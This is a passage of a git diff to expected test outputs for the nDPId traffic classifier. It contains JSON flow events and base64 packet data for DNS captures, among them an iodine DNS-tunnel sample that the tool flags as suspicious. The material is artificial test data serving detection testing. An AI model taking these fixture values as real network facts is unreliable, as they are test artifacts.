+00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1282356640051,"flow_last_seen":1282356640051,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1282356640051,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vaaaakardli.pirate.sea","num_queries":1,"num_answers":1,"reply_code":0,"query_type":10,"rsp_type":10,"rsp_addr":"0.0.0.0"}}
 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1282356640051,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"ts_msec":1282356640051,"pkt":"CAAnx266CAAnnOC0CABFAABZAABAAEARImMKAAIeCgACFK5fADUARcobMN8BAAABAAAAAAAAIGxhZWdwdW1pcGxoaHB6MTJ5bmQxZWZsandsa2pjZ3d5BnBpcmF0ZQNzZWEAAAoAAQ=="}
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":438,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1282356640051,"flow_last_seen":1282356664538,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1470,"flow_tot_l4_payload_len":52024,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1282356664538,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23":"Suspicious DNS traffic"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":438,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1282356640051,"flow_last_seen":1282356664538,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1470,"flow_tot_l4_payload_len":52024,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1282356664538,"l3_proto":"ip4","src_ip":"10.0.2.30","dst_ip":"10.0.2.20","src_port":44639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00166{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":438,"source":"dns-tunnel-iodine.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 438/434
@@ -15,10 +15,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4607415 bytes
-~~ total memory freed........: 4607415 bytes
-~~ total allocations/frees...: 99987/99987
+~~ total memory allocated....: 4692368 bytes
+~~ total memory freed........: 4692368 bytes
+~~ total allocations/frees...: 101577/101577
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 171 chars
-~~ json string max len.......: 804 chars
-~~ json string avg len.......: 553 chars
+~~ json string max len.......: 912 chars
+~~ json string avg len.......: 605 chars
diff --git a/test/results/dns_ambiguous_names.pcap.out b/test/results/dns_ambiguous_names.pcap.out
index d89c2c7b8..ceb66a739 100644
--- a/test/results/dns_ambiguous_names.pcap.out
+++ b/test/results/dns_ambiguous_names.pcap.out
@@ -1,64 +1,64 @@
 00451{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123717,"flow_last_seen":1625744123717,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1625744123717,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625744123717,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"ts_msec":1625744123717,"pkt":"ABshv2HAVASmitEsCABFAABS3sIAAEARfvYKyAILCAgICLz3ADUAPh0yZjEBIAABAAAAAAABCjQxLWNvdXJpZXIEcHVzaAVhcHBsZQNjb20AAAEAAQAAKRAAAAAAAAAA"}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123717,"flow_last_seen":1625744123717,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1625744123717,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"41-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123717,"flow_last_seen":1625744123717,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1625744123717,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"41-courier.push.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00807{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1625744123759,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"ts_msec":1625744123759,"pkt":"VASmitEsEL9IThY0CABFAAEwD4cAADwRUVQICAgICsgCCwA1vPcBHJeKZjGBgAABAAoAAAABCjQxLWNvdXJpZXIEcHVzaAVhcHBsZQNjb20AAAEAAcAMAAUAAQAAJNcAJgI0MRJjb3VyaWVyLXB1c2gtYXBwbGUDY29tBmFrYWRucwNuZXQAwDcABQABAAAAOwAgEmV1LW5vcnRoLWNvdXJpZXItNApwdXNoLWFwcGxlwE3AaQABAAEAAAARAAQROZKLwGkAAQABAAAAEQAEETmSisBpAAEAAQAAABEABBE5kofAaQABAAEAAAARAAQROZKIwGkAAQABAAAAEQAEETmSicBpAAEAAQAAABEABBE5koTAaQABAAEAAAARAAQROZKGwGkAAQABAAAAEQAEETmShQAAKQIAAAAAAAAA"}
-00774{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123717,"flow_last_seen":1625744123759,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1625744123759,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"41-courier.push.apple.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.146.139"}}
+00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123717,"flow_last_seen":1625744123759,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1625744123759,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"41-courier.push.apple.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.146.139"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123764,"flow_last_seen":1625744123764,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1625744123764,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1625744123764,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1625744123764,"pkt":"ABshv2HAVASmitEsCABFAABI3soAAEARfvgKyAILCAgICN\/KADUANB0owxkBIAABAAAAAAABBXRlYW1zBXNreXBlA2NvbQAAAQABAAApEAAAAAAAAAA="}
-00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123764,"flow_last_seen":1625744123764,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1625744123764,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"teams.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123764,"flow_last_seen":1625744123764,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1625744123764,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"teams.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1625744123792,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"ts_msec":1625744123792,"pkt":"VASmitEsEL9IThY0CABFAAB5Cy0AADwRVmUICAgICsgCCwA138oAZUD8wxmBgAABAAIAAAABBXRlYW1zBXNreXBlA2NvbQAAAQABwAwABQABAAAIAwAVBnMtMDAwMQhzLW1zZWRnZQNuZXQAwC0AAQABAAAAqAAEDWsDgAAAKQIAAAAAAAAA"}
-00758{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123764,"flow_last_seen":1625744123792,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1625744123792,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"teams.skype.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.3.128"}}
+00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123764,"flow_last_seen":1625744123792,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1625744123792,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"teams.skype.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"13.107.3.128"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123796,"flow_last_seen":1625744123796,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1625744123796,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1625744123796,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1625744123796,"pkt":"ABshv2HAVASmitEsCABFAABM3uAAAEARft4KyAILCAgICN7bADUAOB0s27sBIAABAAAAAAABA2FwaQV0ZWFtcwVza3lwZQNjb20AAAEAAQAAKRAAAAAAAAAA"}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123796,"flow_last_seen":1625744123796,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1625744123796,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.teams.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123796,"flow_last_seen":1625744123796,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1625744123796,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.teams.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1625744123823,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":1625744123823,"pkt":"VASmitEsEL9IThY0CABFAADPnR4AADwRxB0ICAgICsgCCwA13tsAu9ue27uBgAABAAQAAAABA2FwaQV0ZWFtcwVza3lwZQNjb20AAAEAAcAMAAUAAQAADJMAHgl0ZWFtcy1hZmQOdHJhZmZpY21hbmFnZXIDbmV0AMAxAAUAAQAAAOwALxx0ZWFtcy1hZmQtdHJhZmZpY21hbmFnZXItbmV0BnMtMDAwNAhzLW1zZWRnZcBKwFsABQABAAAAjQACwHjAeAABAAEAAACNAAQ0ccKDAAApAgAAAAAAAAA="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123796,"flow_last_seen":1625744123823,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1625744123823,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.teams.skype.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.113.194.131"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123796,"flow_last_seen":1625744123823,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1625744123823,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.teams.skype.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.113.194.131"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123828,"flow_last_seen":1625744123828,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1625744123828,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1625744123828,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1625744123828,"pkt":"ABshv2HAVASmitEsCABFAABO3ucAAEARftUKyAILCAgICLQ2ADUAOh0u7g0BIAABAAAAAAABCmFsdDItbXRhbGsGZ29vZ2xlA2NvbQAAAQABAAApEAAAAAAAAAA="}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123828,"flow_last_seen":1625744123828,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1625744123828,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"alt2-mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123828,"flow_last_seen":1625744123828,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1625744123828,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"alt2-mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1625744123853,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"ts_msec":1625744123853,"pkt":"VASmitEsEL9IThY0CABFAACB5h8AADwRe2oICAgICsgCCwA1tDYAbSCd7g2BgAABAAIAAAABCmFsdDItbXRhbGsGZ29vZ2xlA2NvbQAAAQABwAwABQABAABUXwAXBGFsdDINbW9iaWxlLWd0YWxrNAFswBfAMwABAAEAAAErAAStwsq8AAApAgAAAAAAAAA="}
-00773{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123828,"flow_last_seen":1625744123853,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1625744123853,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"alt2-mtalk.google.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.202.188"}}
+00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744123828,"flow_last_seen":1625744123853,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1625744123853,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"alt2-mtalk.google.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.202.188"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123858,"flow_last_seen":1625744123858,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1625744123858,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1625744123858,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"ts_msec":1625744123858,"pkt":"ABshv2HAVASmitEsCABFAABT3wQAAEARfrMKyAILCAgICOEgADUAPx0zyVMBIAABAAAAAAABB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAEAACkQAAAAAAAAAA=="}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744123858,"flow_last_seen":1625744123858,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1625744123858,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
